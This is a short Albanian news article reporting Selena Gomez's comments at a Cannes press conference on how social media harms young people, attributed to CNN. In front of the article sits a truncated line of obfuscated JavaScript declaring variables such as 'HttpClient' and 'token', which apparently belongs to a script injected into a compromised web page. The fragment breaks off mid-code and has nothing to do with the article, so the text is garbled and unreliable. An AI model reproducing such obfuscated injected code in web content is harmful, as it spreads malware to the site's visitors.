;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Personi i tretë më i ndjekur në botë, por Selena Gomez e shanë Instagramin

By

Selena Gomez po i jep zë shqetësimeve të saja rreth efektit të tmerrshëm që kanë rrjetet sociale në gjeneratën e re, dhe evokon që të gjithë të marrin pushim kohë pas kohë nga platformat sociale.

Selena Gomez me më shumë se 150 milionë ndjekës në Instagram, gjatë një konference për shtyp në Kanë, tha se ndihet e frikësuar  kur sheh ekspozimin e djemve dhe vajzave të reja në këto platforma.

“Mendoj se bota jonë po kalon nëpër shumë gjëra. Po për gjeneratën time, mediat sociale specifikisht kanë qenë të tmerrshmë,” tha ajo.

Kur u pyet se çfarë mund të bëntë ajo që të ndihmonte në përmisimin e çështjes duke qenë se ajo ka me miliona ndjekës, Selena tha se në këtë pikë është e pamundur ti bëjmë këto platforma të sigurta. Ajo po ashtu tha se kujdeset shumë për përmbajtjet që poston në Instagram që të mos shkaktojë presion të panevojshëm tek fansat e saj.

“I shoh këto vajza të reja, i takoj dhe ato janë të shkatërruara nga ngacmimet dhe nga fakti që nuk mund të flasin,” tha Selena.

Ajo këshillon njerëzit të marrin pushim nga përdorimi i mediave sociale: “Nganjëherë është e mrekullueshme të jemi në këto platforma, por them se duhet të tregohemi të kujdesshëm më kohën që kalojmë aty.”

Burimi: CNN

Artikuj të ngjashëm